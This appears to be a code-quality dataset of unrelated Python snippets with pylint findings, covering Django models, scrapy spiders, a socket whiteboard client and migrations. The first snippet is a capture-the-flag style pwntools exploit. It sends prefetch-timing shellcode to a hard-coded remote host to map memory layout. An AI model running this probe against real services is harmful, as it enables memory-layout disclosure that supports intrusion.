1 from pwn import * 2 import time 3 4 context.update(arch='x86', bits=64) 5 6 iteration = 0x1000 7 cache_cycle = 0x10000000 8 9 shellcode = asm(''' 10 _start: 11 mov rdi, 0x200000000 12 mov rsi, 0x300000000 13 mov rbp, 0 14 loop_start: 15 rdtsc 16 shl rdx, 32 17 or rax, rdx 18 push rax 19 mov rax, rdi 20 mov rdx, %d 21 a: 22 mov rcx, 0x1000 23 a2: 24 prefetcht1 [rax+rcx] 25 loop a2 26 dec edx 27 cmp edx, 0 28 ja a 29 b: 30 rdtsc 31 shl rdx, 32 32 or rax, rdx 33 pop rbx 34 sub rax, rbx 35 cmp rax, %d 36 jb exists 37 mov byte ptr [rsi], 1 38 jmp next 39 exists: 40 mov byte ptr [rsi], 0 41 next: 42 inc rsi 43 inc rbp 44 add rdi, 0x2000 45 cmp rbp, 64 46 jne loop_start 47 end: 48 int3 49 ''' % (iteration, cache_cycle)) 50 HOST, PORT = '0.0.0.0', 31337 51 HOST, PORT = '202.120.7.198', 13579 52 r = remote(HOST, PORT) 53 p = time.time() 54 r.send(p32(len(shellcode)) + shellcode) 55 print r.recvall() 56 print time.time() - p 57
55 - error: syntax-error
1 assembly = ''' 2 7328- 400560: c5 f9 6e c7 vmovd %edi,%xmm0 3 7378- 400564: c4 e2 7d 58 c0 vpbroadcastd %xmm0,%ymm0 4 7435- 400569: c5 fd 76 0e vpcmpeqd (%rsi),%ymm0,%ymm1 5 7495- 40056d: c5 fd 76 56 20 vpcmpeqd 0x20(%rsi),%ymm0,%ymm2 6 7559- 400572: c5 fd 76 5e 40 vpcmpeqd 0x40(%rsi),%ymm0,%ymm3 7 7623- 400577: c5 fd 76 86 80 00 00 vpcmpeqd 0x80(%rsi),%ymm0,%ymm0 8 7687- 40057e: 00 9 7701- 40057f: c5 f5 6b ca vpackssdw %ymm2,%ymm1,%ymm1 10 7761- 400583: c5 e5 6b c0 vpackssdw %ymm0,%ymm3,%ymm0 11 7821- 400587: c5 f5 63 c0 vpacksswb %ymm0,%ymm1,%ymm0 12 7881- 40058b: c5 fd d7 c0 vpmovmskb %ymm0,%eax 13 7934- 40058f: c5 f8 77 vzeroupper 14 ''' 15 16 print(assembly) 17 lines = assembly.strip().splitlines() 18 i = 0 19 while True: 20 if i >= len(lines): 21 break 22 line = lines[i] 23 i += 1 24 line = line[line.find(':') + 3:] 25 byte1 = line[:2] if len(line) >= 2 else ' ' 26 byte2 = line[3:5] if len(line) >= 5 else ' ' 27 byte3 = line[6:8] if len(line) >= 8 else ' ' 28 byte4 = line[9:11] if len(line) >= 11 else ' ' 29 byte5 = line[12:14] if len(line) >= 14 else ' ' 30 byte6 = line[15:17] if len(line) >= 17 else ' ' 31 byte7 = line[18:20] if len(line) >= 20 else ' ' 32 if byte6 != ' ': 33 comment = line[24:] 34 line = lines[i] 35 i += 1 36 line = line[line.find(':') + 3:] 37 byte8 = line[:2] if len(line) >= 2 else ' ' 38 print(' QUAD $0x%s%s%s%s%s%s%s%s // %s' % (byte8, byte7, byte6, byte5, byte4, byte3, byte2, byte1, comment)) 39 elif byte5 != ' ': 40 print(' LONG $0x%s%s%s%s; BYTE $0x%s // %s' % (byte4, byte3, byte2, byte1, byte5, line[24:])) 41 elif byte4 != ' ': 42 print(' LONG $0x%s%s%s%s // %s' % (byte4, byte3, byte2, byte1, line[24:])) 43 elif byte3 != ' ': 44 print(' WORD $0x%s%s; BYTE $0x%s // %s' % (byte2, byte1, byte3, line[24:]))
Clean Code: No Issues Detected
1 from white_board import WhiteBoard 2 import json 3 4 ''' 5 This file is used to run locally or to debug 6 ''' 7 8 with open('config.json') as json_file: 9 start_config = json.load(json_file) 10 11 12 def main(): 13 board = WhiteBoard("client", start_config) 14 board.start_local() 15 16 17 if __name__ == '__main__': 18 main()
4 - warning: pointless-string-statement 8 - warning: unspecified-encoding
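The unspecified-encoding warning goes away once open() is given an explicit encoding; a sketch of line 8, assuming the config file is UTF-8:

with open('config.json', encoding='utf-8') as json_file:
    start_config = json.load(json_file)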
1 import socket
2 import json
3 import sys
4 import math
5 from white_board import WhiteBoard, binary_to_dict
6 
7 '''
8 Load the initial configuration stored in config.json, which contains the drawing mode, the colour and
9 the stroke size.
10 These parameters can then be changed by the user in the pygame interface
11 '''
12 
13 with open('config.json') as json_file:
14     start_config = json.load(json_file)
15 
16 '''
17 Definition of the server's IP address. Here the server runs locally.
18 '''
19 hote = start_config["ip_serveur"]
20 
21 port = 5001
22 
23 
24 def main():
25     """
26     Create a socket to communicate over a TCP/IP protocol
27     """
28     connexion_avec_serveur = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
29     # Connect to the server
30     try:
31         connexion_avec_serveur.connect((hote, port))
32     except (TimeoutError, ConnectionRefusedError, ConnectionResetError, ConnectionAbortedError) as e:
33         return print("The server did not respond, check the connection settings")
34     print("Connection to the server succeeded")
35 
36     # First get the client id
37     username = binary_to_dict(connexion_avec_serveur.recv(2 ** 16))["client_id"]
38 
39     # Second get the message size
40     msg_recu = connexion_avec_serveur.recv(2 ** 8)
41     message_size = binary_to_dict(msg_recu)["message_size"]
42 
43     # Then get the first chunk of history using the number of bytes equal to the power of 2 just above its size
44     msg_recu = connexion_avec_serveur.recv(2 ** int(math.log(message_size, 2) + 1))
45     total_size_received = sys.getsizeof(msg_recu)
46 
47     # Once we get the first chunk, we loop until we get the whole history
48     while total_size_received < message_size:
49         msg_recu += connexion_avec_serveur.recv(2 ** int(math.log(message_size, 2) + 1))
50 
51         total_size_received = sys.getsizeof(msg_recu)
52     msg_decode = binary_to_dict(msg_recu)
53     hist = msg_decode
54 
55     # After receiving the whiteboard state, i.e. the figures and textboxes already drawn by
56     # previous users, the program starts a whiteboard
57     whiteboard = WhiteBoard(username, start_config, hist)
58     whiteboard.start(connexion_avec_serveur)
59 
60 
61 if __name__ == '__main__':
62     main()
7 - warning: pointless-string-statement 13 - warning: unspecified-encoding 16 - warning: pointless-string-statement 24 - refactor: inconsistent-return-statements 32 - warning: unused-variable
1 from oauth2_provider.views.generic import ProtectedResourceView
2 from django.http import HttpResponse
1 - warning: unused-import 2 - warning: unused-import
1 # This script is written under the username admin, with project name Retrofm
2 # Change the class name AdminRetrofmSpider accordingly
3 import datetime
4 
5 _start_date = datetime.date(2012, 12, 25)
6 _initial_date = datetime.date(2012, 12, 25)
7 _priority = 0
8 start_urls = ['http://retrofm.ru']
9 
10 
11 def parse(self, response):
12     while AdminRetrofmSpider._start_date < self.datetime.date.today():
13         AdminRetrofmSpider._priority -= 1
14         AdminRetrofmSpider._start_date += self.datetime.timedelta(days=1)
15         theurlstart = 'http://retrofm.ru/index.php?go=Playlist&date=%s' % (
16             AdminRetrofmSpider._start_date.strftime("%d.%m.%Y"))
17         theurls = []
18         theurls.append(theurlstart + '&time_start=17%3A00&time_stop=23%3A59')
19         theurls.append(theurlstart + '&time_start=11%3A00&time_stop=17%3A01')
20         theurls.append(theurlstart + '&time_start=05%3A00&time_stop=11%3A01')
21         theurls.append(theurlstart + '&time_start=00%3A00&time_stop=05%3A01')
22 
23         for theurl in theurls:
24             request = Request(theurl, method="GET",
25                 dont_filter=True, priority=(AdminRetrofmSpider._priority), callback=self.parse)
26             self.insert_link(request)
12 - warning: protected-access 12 - error: undefined-variable 13 - error: undefined-variable 14 - error: undefined-variable 16 - warning: protected-access 16 - error: undefined-variable 24 - error: undefined-variable 25 - warning: protected-access 25 - error: undefined-variable 11 - warning: unused-argument
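All the undefined-variable hits come from the snippet being a fragment: AdminRetrofmSpider, Request, and the object providing insert_link are never defined here. A minimal sketch of the missing scaffolding, with the class name taken from the header comment (the base class and imports are assumptions):

import datetime

from scrapy import Request, Spider


class AdminRetrofmSpider(Spider):
    name = 'admin_retrofm'
    _start_date = datetime.date(2012, 12, 25)
    _initial_date = datetime.date(2012, 12, 25)
    _priority = 0
    start_urls = ['http://retrofm.ru']
    # the parse() method above would then live inside this class,
    # referencing the datetime module directly instead of self.datetime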
1 # -*- coding: utf-8 -*-
2 
3 # Define here the models for your scraped items
4 #
5 # See documentation in:
6 # https://doc.scrapy.org/en/latest/topics/items.html
7 
8 import scrapy
9 from scrapy.item import Item ,Field
10 
11 from scrapy.loader import ItemLoader
12 from scrapy.loader.processors import TakeFirst, MapCompose, Join
13 
14 class DemoLoader(ItemLoader):
15    default_output_processor = TakeFirst()
16    title_in = MapCompose(unicode.title)
17    title_out = Join()
18    size_in = MapCompose(unicode.strip)
19    # you can continue scraping here
20 class DemoItem(scrapy.Item):
21 
22 
23     # define the fields for your item here like:
24     product_title = scrapy.Field()
25     product_link = scrapy.Field()
26 
27     product_description = scrapy.Field()
28 
29     pass
15 - warning: bad-indentation 16 - warning: bad-indentation 17 - warning: bad-indentation 18 - warning: bad-indentation 16 - error: undefined-variable 18 - error: undefined-variable 14 - refactor: too-few-public-methods 29 - warning: unnecessary-pass 20 - refactor: too-few-public-methods 9 - warning: unused-import 9 - warning: unused-import
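The undefined-variable errors on lines 16 and 18 are another Python 2 artifact: the unicode builtin does not exist in Python 3, where str carries the same methods. A sketch of the two processors under Python 3:

title_in = MapCompose(str.title)
size_in = MapCompose(str.strip)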
1 from django.db import models
2 from blog.models import Post
3 # Creating a comment system
4 class Comment(models.Model):
5     post = models.ForeignKey(Post,
6                              on_delete=models.CASCADE,
7                              related_name='comments')
8     name=models.CharField(max_length=200)
9     email=models.EmailField()
10     body=models.TextField()
11     created=models.DateTimeField(auto_now_add=True)
12     updated=models.DateTimeField(auto_now_add=True)
13     active=models.BooleanField(default=True)
14 
15     class Meta:
16         ordering=('created',)
17 
18     def __str__(self):
19         return f'comment by {self.name} on {self.post}'
20 
21 
15 - refactor: too-few-public-methods 4 - refactor: too-few-public-methods
1 from django.db import models
2 from django.contrib.auth.models import User
3 
4 
5 class Project(models.Model):
6     project_name = models.CharField(max_length=50)
7     user = models.ForeignKey(User)
8     link_generator = models.TextField(blank=True)
9     scraper_function = models.TextField(blank=True)
10     settings_scraper = models.TextField(blank=True)
11     settings_link_generator = models.TextField(blank=True)
12 
13     def __str__(self):
14         return "%s by %s" % (self.project_name, self.user.username)
15 
16 
17 class Item(models.Model):
18     item_name = models.CharField(max_length=50)
19     project = models.ForeignKey(Project, on_delete=models.CASCADE)
20 
21     def __str__(self):
22         return self.item_name
23 
24 
25 class Field(models.Model):
26     field_name = models.CharField(max_length=50)
27     item = models.ForeignKey(Item, on_delete=models.CASCADE)
28 
29     def __str__(self):
30         return self.field_name
31 
32 
33 class Pipeline(models.Model):
34     pipeline_name = models.CharField(max_length=50)
35     pipeline_order = models.IntegerField()
36     pipeline_function = models.TextField(blank=True)
37     project = models.ForeignKey(Project, on_delete=models.CASCADE)
38 
39     def __str__(self):
40         return self.pipeline_name
41 
42 
43 class LinkgenDeploy(models.Model):
44     project = models.ForeignKey(Project, on_delete=models.CASCADE)
45     success = models.BooleanField(blank=False)
46     date = models.DateTimeField(auto_now_add=True)
47     version = models.IntegerField(blank=False, default=0)
48 
49 
50 class ScrapersDeploy(models.Model):
51     project = models.ForeignKey(Project, on_delete=models.CASCADE)
52     success = models.TextField(blank=True)
53     date = models.DateTimeField(auto_now_add=True)
54     version = models.IntegerField(blank=False, default=0)
55 
56 
57 class Dataset(models.Model):
58     user = models.ForeignKey(User)
59     database = models.CharField(max_length=50)
5 - refactor: too-few-public-methods 17 - refactor: too-few-public-methods 25 - refactor: too-few-public-methods 33 - refactor: too-few-public-methods 43 - refactor: too-few-public-methods 50 - refactor: too-few-public-methods 57 - refactor: too-few-public-methods
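Pylint only reports class sizes here, but the two bare models.ForeignKey(User) calls (lines 7 and 58) stop working on Django 2.0+, where on_delete became a required argument. A sketch of the fix, assuming cascade deletion is the intended behaviour:

user = models.ForeignKey(User, on_delete=models.CASCADE)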
1 # -*- coding: utf-8 -*-
2 """
3 -------------------------------------------------
4    File Name:     custom_filter.py
5    Description :
6    Author :       JHao
7    date:          2017/4/14
8 -------------------------------------------------
9    Change Activity:
10                   2017/4/14:
11 -------------------------------------------------
12 """
13 __author__ = 'JHao'
14 
15 import markdown
16 from django import template
17 from django.utils.safestring import mark_safe
18 from django.template.defaultfilters import stringfilter
19 
20 register = template.Library()
21 
22 
23 @register.filter
24 def slice_list(value, index):
25     return value[index]
26 
27 
28 @register.filter(is_safe=True)
29 @stringfilter
30 def custom_markdown(value):
31     content = mark_safe(markdown.markdown(value,
32                                           output_format='html5',
33                                           extensions=[
34                                               'markdown.extensions.extra',
35                                               'markdown.extensions.fenced_code',
36                                               'markdown.extensions.tables',
37                                           ],
38                                           safe_mode=True,
39                                           enable_attributes=False))
40     return content
41 
42 
43 @register.filter
44 def tag2string(value):
45     """
46     Convert Tags to a string, e.g. > 'python,爬虫'
47     :param value:
48     :return:
49     """
50     return ','.join([each.get('tag_name', '') for each in value])
51 
52 
53 if __name__ == '__main__':
54     pass
Clean Code: No Issues Detected
1 import scrapy
2 from scrapy.spiders import CSVFeedSpider
3 from scrapy.spiders import SitemapSpider
4 
5 from scrapy.spiders import CrawlSpider,Rule
6 from scrapy.linkextractor import LinkExtractor
7 from tuto.items import DemoItem
8 from scrapy.loader import ItemLoader
9 from tuto.items import Demo
10 
11 class DemoSpider(CrawlSpider):
12     name='demo'
13     allowed_domais=["www.tutorialspoint.com"]
14     start_url=["https://www.tutorialspoint.com/scrapy/index.htm"]
15 
16     def parse(self, response):
17         l = ItemLoader(item = Product(), response = response)
18         l.add_xpath("title", "//div[@class = 'product_title']")
19         l.add_xpath("title", "//div[@class = 'product_name']")
20         l.add_xpath("desc", "//div[@class = 'desc']")
21         l.add_css("size", "div#size]")
22         l.add_value("last_updated", "yesterday")
23         return l.load_item()
24         # loader = ItemLoader(item = Item())
25         # loader.add_xpath('social''a[@class = "social"]/@href')
26         # loader.add_xpath('email','a[@class = "email"]/@href')
27 
28     # rules =(
29     #     Rule(LinkExtractor(allow=(),restrict_xpaths=('')))
30     # )
31 
32 class DemoSpider(CSVFeedSpider):
33     name = "demo"
34     allowed_domains = ["www.demoexample.com"]
35     start_urls = ["http://www.demoexample.com/feed.csv"]
36     delimiter = ";"
37     quotechar = "'"
38     headers = ["product_title", "product_link", "product_description"]
39 
40     def parse_row(self, response, row):
41         self.logger.info("This is row: %r", row)
42         item = DemoItem()
43         item["product_title"] = row["product_title"]
44         item["product_link"] = row["product_link"]
45         item["product_description"] = row["product_description"]
46         return item
47 
48 class DemoSpider(SitemapSpider):
49     urls = ["http://www.demoexample.com/sitemap.xml"]
50 
51     rules = [
52         ("/item/", "parse_item"),
53         ("/group/", "parse_group"),
54     ]
55 
56     def parse_item(self, response):
57         # you can scrap item here
58 
59     def parse_group(self, response):
60         # you can scrap group here
59 - error: syntax-error
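The syntax error arises because parse_item contains no statements: a comment alone is not a valid function body, so parsing fails when the def on line 59 is reached. A sketch of valid stubs, with the comments kept and pass added:

def parse_item(self, response):
    # you can scrape the item here
    pass

def parse_group(self, response):
    # you can scrape the group here
    pass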
1 from django.contrib import admin
2 
3 # Register your models here.
4 
5 
6 from blog.models import Tag, Article, Category
7 
8 
9 @admin.register(Article)
10 class ArticleAdmin(admin.ModelAdmin):
11     date_hierarchy = 'date_time'
12     list_display = ('title', 'category', 'author', 'date_time', 'view')
13     list_filter = ('category', 'author')
14     filter_horizontal = ('tag',)
15 
16 
17 @admin.register(Category)
18 class CategoryAdmin(admin.ModelAdmin):
19     pass
20 
21 
22 @admin.register(Tag)
23 class TagAdmin(admin.ModelAdmin):
24     pass
10 - refactor: too-few-public-methods 18 - refactor: too-few-public-methods 23 - refactor: too-few-public-methods
1 # -*- coding: utf-8 -*-
2 from __future__ import unicode_literals
3 
4 from django.db import migrations, models
5 
6 
7 class Migration(migrations.Migration):
8 
9     dependencies = [
10         ('scrapyproject', '0004_pipeline_pipeline_function'),
11     ]
12 
13     operations = [
14         migrations.RemoveField(
15             model_name='project',
16             name='settings',
17         ),
18         migrations.AddField(
19             model_name='project',
20             name='settings_link_generator',
21             field=models.TextField(blank=True),
22         ),
23         migrations.AddField(
24             model_name='project',
25             name='settings_scraper',
26             field=models.TextField(blank=True),
27         ),
28     ]
7 - refactor: too-few-public-methods
1 
2 import scrapy
3 
4 
5 class FirstScrapyItem(scrapy.Item):
6     # define the fields for your item here like:
7 
8     item=DmozItem()
9 
10     item ['title'] = scrapy.Field()
11     item ['url'] = scrapy.Field()
12     item ['desc'] = scrapy.Field()
13 
8 - error: undefined-variable 5 - refactor: too-few-public-methods
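Besides the undefined DmozItem, scrapy fields are conventionally declared as class attributes of the item, not assigned onto another item instance inside the class body. A sketch of the usual form:

import scrapy


class FirstScrapyItem(scrapy.Item):
    # fields available on the scraped item
    title = scrapy.Field()
    url = scrapy.Field()
    desc = scrapy.Field()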